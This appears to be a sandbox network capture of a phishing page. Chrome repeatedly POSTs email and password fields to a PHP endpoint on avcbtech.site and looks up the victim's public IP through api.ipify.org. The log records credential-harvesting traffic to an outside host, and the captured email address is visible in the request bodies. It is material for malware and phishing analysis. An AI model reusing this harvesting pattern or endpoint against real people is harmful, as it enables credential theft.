2025-03-24 13:43:44 UTC	634	OUT	POST /fuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 24 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:43:44 UTC	24	OUT	Data Raw: 61 69 3d 61 70 70 6c 79 25 34 30 70 65 6f 2e 6f 6e 2e 63 61 26 70 72 3d Data Ascii: ai=apply%40peo.on.ca&pr=
2025-03-24 13:43:44 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:43:44 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=8fb13f3cc202532d9d6a20123062c3ea; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 13:43:44 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49754	104.26.12.205	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:43:44 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:43:45 UTC	465	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:43:45 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9256996a49f4421d-EWR server-timing: cfL4;desc="?proto=TCP&rtt=96969&min_rtt=96784&rtt_var=20697&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=38267&cwnd=249&unsent_bytes=0&cid=ca11f4d44fb4b545&ts=271&x=0"
2025-03-24 13:43:45 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49755	104.168.138.190	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:43:45 UTC	441	OUT	GET /fuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=88cf9e4293a3b3e0e66e09d525835781
2025-03-24 13:43:45 UTC	495	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:43:45 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 13:43:45 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49756	172.67.74.152	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:43:45 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:43:45 UTC	432	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:43:45 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9256996d4a434f0b-EWR server-timing: cfL4;desc="?proto=TCP&rtt=98296&min_rtt=97686&rtt_var=21172&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=961&delivery_rate=38095&cwnd=242&unsent_bytes=0&cid=8a14a01a7532b35b&ts=260&x=0"
2025-03-24 13:43:45 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	49757	104.168.138.190	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:43:53 UTC	634	OUT	POST /fuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 24 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:43:53 UTC	24	OUT	Data Raw: 61 69 3d 61 70 70 6c 79 25 34 30 70 65 6f 2e 6f 6e 2e 63 61 26 70 72 3d Data Ascii: ai=apply%40peo.on.ca&pr=
2025-03-24 13:43:53 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:43:53 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=f47db80fc0d65a935eba5a0fab8d617d; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 13:43:53 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	49759	104.26.12.205	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:43:53 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:43:53 UTC	465	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:43:53 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925699a0c8580cb4-EWR server-timing: cfL4;desc="?proto=TCP&rtt=96911&min_rtt=96750&rtt_var=20656&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=38299&cwnd=228&unsent_bytes=0&cid=5fdad5ef15d3624a&ts=251&x=0"
2025-03-24 13:43:53 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	49760	104.168.138.190	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:43:54 UTC	441	OUT	GET /fuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=88cf9e4293a3b3e0e66e09d525835781
2025-03-24 13:43:54 UTC	495	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:43:54 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 13:43:54 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	49761	172.67.74.152	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:43:54 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:43:54 UTC	432	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:43:54 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925699a44b348c73-EWR server-timing: cfL4;desc="?proto=TCP&rtt=97851&min_rtt=97651&rtt_var=20911&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=961&delivery_rate=37895&cwnd=248&unsent_bytes=0&cid=7411ff61fdb44023&ts=251&x=0"
2025-03-24 13:43:54 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	49762	104.168.138.190	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:44:05 UTC	634	OUT	POST /fuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 24 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:44:05 UTC	24	OUT	Data Raw: 61 69 3d 61 70 70 6c 79 25 34 30 70 65 6f 2e 6f 6e 2e 63 61 26 70 72 3d Data Ascii: ai=apply%40peo.on.ca&pr=
2025-03-24 13:44:05 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:44:05 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=3fe4090ff20e8bf60dc2354b24a2f759; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 13:44:05 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	49764	104.26.12.205	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:44:05 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:44:05 UTC	465	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:44:05 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925699ebcf045590-EWR server-timing: cfL4;desc="?proto=TCP&rtt=99495&min_rtt=96625&rtt_var=23372&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=38536&cwnd=204&unsent_bytes=0&cid=5920072887db30f0&ts=248&x=0"
2025-03-24 13:44:05 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	49765	104.168.138.190	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:44:05 UTC	441	OUT	GET /fuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=88cf9e4293a3b3e0e66e09d525835781
2025-03-24 13:44:06 UTC	495	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:44:06 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 13:44:06 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	49766	172.67.74.152	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:44:05 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:44:06 UTC	432	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:44:06 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925699ee98be41f8-EWR server-timing: cfL4;desc="?proto=TCP&rtt=97441&min_rtt=96994&rtt_var=21142&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2815&recv_bytes=961&delivery_rate=37852&cwnd=223&unsent_bytes=0&cid=2374c009ba461923&ts=254&x=0"
2025-03-24 13:44:06 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	49767	104.168.138.190	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:44:14 UTC	634	OUT	POST /fuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 24 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:44:14 UTC	24	OUT	Data Raw: 61 69 3d 61 70 70 6c 79 25 34 30 70 65 6f 2e 6f 6e 2e 63 61 26 70 72 3d Data Ascii: ai=apply%40peo.on.ca&pr=
2025-03-24 13:44:14 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:44:14 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=a11765f7803c33eae1c77f7bc44f53c3; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 13:44:14 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	49769	104.26.12.205	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:44:14 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:44:14 UTC	465	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:44:14 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92569a233b595e6b-EWR server-timing: cfL4;desc="?proto=TCP&rtt=96826&min_rtt=96696&rtt_var=20597&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1121&delivery_rate=38367&cwnd=236&unsent_bytes=0&cid=c0b5e5ec750722f7&ts=251&x=0"
2025-03-24 13:44:14 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	49770	104.168.138.190	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:44:14 UTC	441	OUT	GET /fuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=88cf9e4293a3b3e0e66e09d525835781
2025-03-24 13:44:15 UTC	495	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:44:15 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 13:44:15 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	49771	172.67.74.152	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:44:14 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:44:15 UTC	432	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:44:15 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92569a260f96c434-EWR server-timing: cfL4;desc="?proto=TCP&rtt=97465&min_rtt=97292&rtt_var=20791&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=961&delivery_rate=38073&cwnd=220&unsent_bytes=0&cid=fdac21a36b9f7d37&ts=253&x=0"
2025-03-24 13:44:15 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	49773	104.168.138.190	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:45:05 UTC	634	OUT	POST /fuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 24 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:45:05 UTC	24	OUT	Data Raw: 61 69 3d 61 70 70 6c 79 25 34 30 70 65 6f 2e 6f 6e 2e 63 61 26 70 72 3d Data Ascii: ai=apply%40peo.on.ca&pr=
